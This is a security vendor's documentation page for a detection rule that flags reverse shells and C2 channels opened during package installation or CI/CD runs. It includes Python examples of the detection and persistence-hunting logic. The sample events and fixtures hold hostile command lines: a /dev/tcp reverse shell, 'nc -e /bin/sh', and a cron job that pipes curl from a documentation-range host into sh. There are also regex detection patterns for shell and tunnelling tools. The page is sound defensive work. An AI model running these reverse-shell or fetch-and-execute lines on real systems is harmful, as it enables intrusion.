For AI agents: A markdown version of this page is available at https://docs.datadoghq.com/security/default_rules/def-000-nkf.md. A documentation index is available at /llms.txt.

Supply chain reverse shell

What happened

A reverse shell or command-and-control (C2) channel was established during a supply chain operation, such as package installation or CI/CD pipeline execution, on host {{host}}. A process running in the supply chain execution context spawned a shell or established a network tunnel to an attacker-controlled endpoint.

Goal

Detect when a malicious package or compromised CI/CD pipeline step establishes remote access through reverse shells, network tunnels, or C2 channels. This pattern is used by attackers to gain interactive access for lateral movement, privilege escalation, and data exfiltration.

Strategy

This rule correlates three signal categories within package_install_* or cicd_runner_* execution contexts:

  • Reverse shell: Execution of netcat-, socat-, openssl-, Python-, or Perl-based reverse shell techniques during package installation or CI/CD execution
  • Network C2: Use of tunneling or lateral movement tools (chisel, ngrok, ligolo-ng), suspicious shell network connections, or IRC connections
  • Persistence: Installation of cron jobs, systemd services, SSH authorized keys, kernel modules, or linker modifications

Persistence is used as a severity amplifier rather than a trigger: a reverse shell or C2 channel combined with persistence indicates the attacker is establishing a durable foothold, not just a one-off connection.
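The correlation described above, written out as an added example in Python. This is illustrative code, not Datadog's rule implementation: the event fields (ctx, key, cmd), the regexes that approximate each technique, and the sample events are all assumptions constructed for this page. The sample events are not real telemetry.

```python
"""Toy correlation of reverse shell, network C2 and persistence signals
within package_install_* / cicd_runner_* execution contexts.

Added example, not Datadog's rule logic. The event shape (ctx, key, cmd)
and the regexes are assumptions chosen for illustration.
"""
import re
from collections import defaultdict

# Execution contexts the rule scopes to.
IN_SCOPE = re.compile(r"^(package_install_|cicd_runner_)")

# Each entry is a list of regexes that must ALL match the command line.
SIGNALS = {
    "reverse_shell": [
        [r"\b(nc|ncat|netcat)\b(?:\s+\S+)*?\s-[a-z]*[ec]\b"],   # nc -e /bin/sh HOST PORT
        [r"\bsocat\b", r"\bexec:"],                              # socat EXEC:/bin/sh ... TCP:HOST:PORT
        [r"\bopenssl\s+s_client\b", r"\b(ba)?sh\b|\bmkfifo\b"],  # mkfifo + openssl s_client shell
        [r"\bpython[23]?\b", r"\bsocket\b", r"\b(subprocess|pty|os\.dup2)\b"],
        [r"\bperl\b", r"\bSocket\b", r"\bexec\b"],
        [r"/dev/(tcp|udp)/"],                                     # bash -i >& /dev/tcp/HOST/PORT 0>&1
    ],
    "network_c2": [
        [r"\b(chisel|ngrok|ligolo(-ng)?)\b"],                     # tunneling / lateral movement tools
        [r"\bircs?://|:(6667|6697)\b"],                           # IRC connections
    ],
    "persistence": [
        [r"/etc/cron|\bcrontab\b"],
        [r"/etc/systemd/system|\bsystemctl\s+enable\b"],
        [r"authorized_keys"],
        [r"\b(insmod|modprobe)\b"],
        [r"/etc/ld\.so\.preload"],
    ],
}
COMPILED = {
    cat: [[re.compile(p, re.I) for p in rule] for rule in rules]
    for cat, rules in SIGNALS.items()
}
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Constructed sample process-execution events (not real telemetry).
EVENTS = [
    {"ctx": "package_install_npm", "key": "host-a:npm:1234", "cmd": "npm install left-pad"},
    {"ctx": "package_install_npm", "key": "host-a:npm:1234",
     "cmd": "bash -c 'bash -i >& /dev/tcp/203.0.113.5/4444 0>&1'"},
    {"ctx": "package_install_npm", "key": "host-a:npm:1234",
     "cmd": "sh -c 'echo \"* * * * * root curl http://203.0.113.5/b.sh | sh\" > /etc/cron.d/update'"},
    {"ctx": "cicd_runner_gha", "key": "host-b:gha:77", "cmd": "ngrok tcp 22"},
    {"ctx": "cicd_runner_gha", "key": "host-b:gha:77", "cmd": "go test ./..."},
    {"ctx": "interactive_ssh", "key": "host-c:ssh:9", "cmd": "nc -e /bin/sh 198.51.100.7 9001"},  # out of scope
    {"ctx": "cicd_runner_gitlab", "key": "host-e:gitlab:3", "cmd": "systemctl enable nightly-build.timer"},
]


def classify(cmd):
    """Return the set of signal categories a single command line matches."""
    return {
        cat for cat, rules in COMPILED.items()
        if any(all(p.search(cmd) for p in rule) for rule in rules)
    }


def correlate(events):
    """Group matching events by correlation key and apply the severity logic."""
    by_key = defaultdict(lambda: {"ctx": None, "categories": set(), "iocs": set(), "commands": []})
    for ev in events:
        if not IN_SCOPE.match(ev["ctx"]):
            continue  # only supply chain execution contexts count
        cats = classify(ev["cmd"])
        if not cats:
            continue
        agg = by_key[ev["key"]]
        agg["ctx"] = ev["ctx"]
        agg["categories"] |= cats
        agg["iocs"] |= set(IPV4.findall(ev["cmd"]))  # destination IPs for IOC tracking
        agg["commands"].append(ev["cmd"])
    signals = {}
    for key, agg in by_key.items():
        if not agg["categories"] & {"reverse_shell", "network_c2"}:
            continue  # persistence alone is an amplifier, never a signal by itself
        severity = "critical" if "persistence" in agg["categories"] else "high"
        signals[key] = {"ctx": agg["ctx"], "severity": severity,
                        "categories": sorted(agg["categories"]),
                        "iocs": sorted(agg["iocs"]), "commands": agg["commands"]}
    return signals


if __name__ == "__main__":
    for key, sig in correlate(EVENTS).items():
        print(f"{sig['severity'].upper():8} {key} {sig['categories']} iocs={sig['iocs']}")
```

Run as written, host-a fires at critical (reverse shell plus a cron job), host-b fires at high (ngrok only), host-c is ignored because an interactive SSH session is not a supply chain context, and host-e does not fire at all because enabling a systemd unit is persistence with no remote access signal. Only IPv4 literals are pulled out as IOCs; a hostname destination would need DNS or connection telemetry to resolve.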

Triage and response

  1. Identify the package or CI/CD step that triggered the shell or network activity by examining the correlation key and process tree.
  2. Capture the destination IP/hostname of the reverse shell or C2 connection for IOC tracking.
  3. Terminate the malicious process and kill the reverse shell connection. Do this after steps 1 and 2: the process tree and the live connection are evidence that disappears once the process is gone.
  4. Check if persistence mechanisms were installed (cron jobs, systemd units, SSH keys) and remove them.
  5. Investigate whether the attacker performed any lateral movement or accessed additional systems.
  6. Remove the malicious package and audit all systems and pipelines that installed the same package version.
  7. Block the C2 IP/domain at the network perimeter.
  8. Follow your organization’s incident response process for active intrusions.
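Steps 2 and 4 above, combined into one added example in Python: given the IOCs captured from the connection and the time the package install or pipeline step started, walk the persistence locations the rule correlates and report files that were modified after that time or that mention an IOC. This is not Datadog's code; the function names (hunt_persistence, build_demo_root, demo) and the list of paths are assumptions, and the demo tree it scans is a constructed fixture planted in a temporary directory, not data from a real host. Paths are resolved relative to a root so the same function runs against "/" on a live host or against a mounted forensic image.

```python
"""Hunt for persistence artifacts after a supply chain reverse shell signal.

Added example, not Datadog's code. Path list and function names are assumptions.
"""
import os
import shutil
import tempfile
import time
from pathlib import Path

# Locations for the persistence mechanisms the rule correlates, relative to a root.
PERSISTENCE_LOCATIONS = {
    "cron": ["etc/crontab", "etc/cron.d", "etc/cron.hourly", "etc/cron.daily", "var/spool/cron"],
    "systemd": ["etc/systemd/system", "usr/lib/systemd/system"],
    "ssh_keys": ["root/.ssh/authorized_keys"],  # per-user keys are added from home/*/.ssh below
    "kernel_modules": ["etc/modules", "etc/modules-load.d"],
    "linker": ["etc/ld.so.preload", "etc/ld.so.conf.d"],
}


def _iter_files(path):
    """Yield a file, or every regular file below a directory, in sorted order."""
    if path.is_file():
        yield path
    elif path.is_dir():
        for p in sorted(path.rglob("*")):
            if p.is_file():
                yield p


def hunt_persistence(root, iocs, since_epoch):
    """Report persistence files modified after since_epoch or mentioning any IOC."""
    root = Path(root)
    locations = {k: list(v) for k, v in PERSISTENCE_LOCATIONS.items()}
    home = root / "home"
    if home.is_dir():
        locations["ssh_keys"] += [
            p.relative_to(root).as_posix() for p in sorted(home.glob("*/.ssh/authorized_keys"))
        ]
    findings = []
    for mechanism, rels in locations.items():
        for rel in rels:
            for f in _iter_files(root / rel):
                reasons = []
                if f.stat().st_mtime >= since_epoch:
                    reasons.append("modified_after_install")
                try:
                    text = f.read_text(errors="replace")
                except OSError:
                    continue
                hits = [ioc for ioc in iocs if ioc in text]
                if hits:
                    reasons.append("mentions_ioc:" + ",".join(hits))
                if reasons:
                    findings.append({"mechanism": mechanism,
                                     "path": f.relative_to(root).as_posix(),
                                     "reasons": reasons})
    return findings


def build_demo_root():
    """Construct a throwaway tree with planted artifacts (fixture, not a real host)."""
    root = Path(tempfile.mkdtemp(prefix="triage-demo-"))
    old = time.time() - 30 * 86400  # benign files predate the incident by a month
    (root / "etc/cron.d").mkdir(parents=True)
    (root / "etc/systemd/system").mkdir(parents=True)
    (root / "root/.ssh").mkdir(parents=True)
    benign_cron = root / "etc/cron.d/logrotate"
    benign_cron.write_text("0 0 * * * root /usr/sbin/logrotate /etc/logrotate.conf\n")
    os.utime(benign_cron, (old, old))
    benign_unit = root / "etc/systemd/system/sshd.service"
    benign_unit.write_text("[Service]\nExecStart=/usr/sbin/sshd -D\n")
    os.utime(benign_unit, (old, old))
    # Planted by the "attacker": a cron job pulling from the C2 host and a fresh SSH key.
    (root / "etc/cron.d/update").write_text("* * * * * root curl http://203.0.113.5/b.sh | sh\n")
    (root / "root/.ssh/authorized_keys").write_text(
        "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICONSTRUCTEDDEMOKEY attacker\n")
    return root


def demo():
    """Build the fixture, hunt with the IOC from the reverse shell, clean up, return findings."""
    root = build_demo_root()
    try:
        return hunt_persistence(root, ["203.0.113.5"], since_epoch=time.time() - 3600)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for finding in demo():
        print(f"{finding['mechanism']:14} {finding['path']}  {', '.join(finding['reasons'])}")
```

The two planted artifacts are reported and the two month-old benign files are not. On a real host, pass "/" (or the mount point of an image) as root, the IOCs from step 2, and the install or pipeline start time; anything flagged only as modified_after_install still needs a human look, since a legitimate package may also drop a cron job or unit file.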